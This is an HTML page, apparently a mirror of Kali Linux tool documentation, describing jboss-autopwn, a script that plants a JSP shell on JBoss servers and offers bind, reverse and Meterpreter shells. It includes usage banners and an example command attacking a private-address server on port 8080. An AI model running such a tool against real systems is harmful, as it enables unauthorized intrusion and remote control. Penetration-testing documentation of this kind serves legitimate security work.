<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>kali工具箱</title>
<script src="./static/bootstrap.min.js"></script>
<link rel="stylesheet" href="./static/main.css">
<link rel="stylesheet" href="./static/bootstrap.min.css">
<style type="text/css" id="syntaxhighlighteranchor"></style>
</head>
<main class="main-container ng-scope" ng-view="">
<div class="main receptacle post-view ng-scope">
<article class="entry ng-scope" ng-controller="EntryCtrl" ui-lightbox="">
<section class="entry-content ng-binding" ng-bind-html="postContentTrustedHtml">
<section class="l-section"><div class="l-section-h i-cf"><h2>jboss-autopwn Package Description</h2>
<p style="text-align: justify;">This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session.</p>
<p>Features include:</p>
<ul>
<li>Multiplatform support – tested on Windows, Linux and Mac targets</li>
<li>Support for bind and reverse bind shells</li>
<li>Meterpreter shells and VNC support for Windows targets</li>
</ul>
<p>Source: https://github.com/SpiderLabs/jboss-autopwn<br>
<a href="https://github.com/SpiderLabs/jboss-autopwn" variation="deepblue" target="blank">jboss-autopwn Homepage</a> | <a href="http://git.kali.org/gitweb/?p=packages/jboss-autopwn.git;a=summary" variation="deepblue" target="blank">Kali jboss-autopwn Repo</a></p>
<ul>
<li>Author: Christian G. Papathanasiou, Trustwave Holdings, Inc.</li>
<li>License: GPLv2</li>
</ul>
<h3>Tools included in the jboss-autopwn package</h3>
<h5>jboss-win – JBoss Windows autopwn</h5>
<code><a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="2a5845455e6a414b4643">[email&#160;protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>:~# <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="c5b7aaaab185aea4a9ac">[email&#160;protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>:~# jboss-win<br>
[!] JBoss Windows autopwn<br>
[!] Usage: ./e2.sh server port<br>
[!] Christian Papathanasiou <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="5b382b3a2b3a2f333a353a2832342e1b2f292e282f2c3a2d3e75383436">[email&#160;protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script><br>
[!] Trustwave SpiderLabs</code>
<h3>jboss-linux – JBoss *nix autopwn</h3>
<code><a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="24564b4b50644f45484d">[email&#160;protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>:~# jboss-linux<br>
[!] JBoss *nix autopwn<br>
[!] Usage: ./e.sh server port<br>
[!] Christian Papathanasiou<br>
[!] Trustwave SpiderLabs</code>
<h3>jboss-autopwn Usage Example</h3>
<p>Attack the target server <b><i>(192.168.1.200)</i></b> on the specified port <b><i>(8080)</i></b>, redirecting stderr <b><i>(2&gt; /dev/null)</i></b>:</p>
<code><a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="81f3eeeef5c1eae0ede8">[email&#160;protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>:~# jboss-linux 192.168.1.200 8080 2&gt; /dev/null<br>
[x] Retrieving cookie<br>
[x] Now creating BSH script...<br>
[!] Cound not create BSH script..<br>
[x] Now deploying .war file:</code>
</div></section><div style="display:none">
<script src="//s11.cnzz.com/z_stat.php?id=1260038378&web_id=1260038378" language="JavaScript"></script>
</div>
</main></body></html>
